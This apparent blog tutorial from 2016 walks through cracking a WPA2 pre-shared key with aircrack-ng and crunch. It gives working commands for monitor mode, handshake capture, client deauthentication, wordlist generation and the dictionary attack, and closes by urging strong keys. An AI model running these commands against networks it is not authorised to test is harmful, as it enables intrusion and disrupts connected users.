Wi-Fi Attack. WPA2 Pre-Shared Key Cracking.
12 Jun 2016
In this article we will study how attacker can get access to Wi-Fi access point protected with WPA2 PSK. We will use Kali Linux distribution and penetration tools such as aircrack-ng and crunch.
1. Get wireless network interface.
2. Turn wireless card into monitor mode.
# airmon-ng start wlan0
3. Check compatibility to aircrack-ng.
You can find information about compatibility of wireless chipsets and drivers to aircrack-ng here.
4. Run wireless packet capture.
# airodump-ng wlan0mon
We will crack AP (ESSID) in demonstration purpose. It's MAC address AA:53:95:B8:89:C7 (BSSID) and used channel 1.
5. Capture and save the traffic of defined Wi-Fi access point.
# airodump-ng --bssid AA:53:95:B8:89:C7 -c 1 --write AP wlan0mon
6. Deauthenticate the client.
We need to deauthenticate the client in order to get 4-way hanshake. Client's MAC address 00:26:5E:81:29:8A.
# aireplay-ng -0 1 -a AA:53:95:B8:89:C7 -c 00:26:5E:81:29:8A wlan0mon
In some cases you can get message "Couldn't determine current channel for wlan0mon, you should either force the operation with --ignore-negative-one or apply a kernel patch". As a result your attempt to deauthenticate the client can be failed. I met this problem during aircrack-ng testing in Ubuntu Desktop environment.
Our attempt was successful. So we can see "WPA handshake: AA:53:95:B8:89:C7" in the right top corner of airodump-ng output (Step 5).
Let's check captured packets with Wireshark. We should apply "eapol" as filter in order to see 4-way handshake.
7. Prepary wordlist dictionary.
We suppose that PSK of AP (ESSID) is eight-digit number. We will use password generator crunch in order to prepare dictionary.
# crunch 8 8 0123456789 -o number_password.list
8. Run PSK attack.
# aircrack-ng AP-01.cap -w number_password.list
You should use strong PSK in order to protect access to Wi-Fi access point.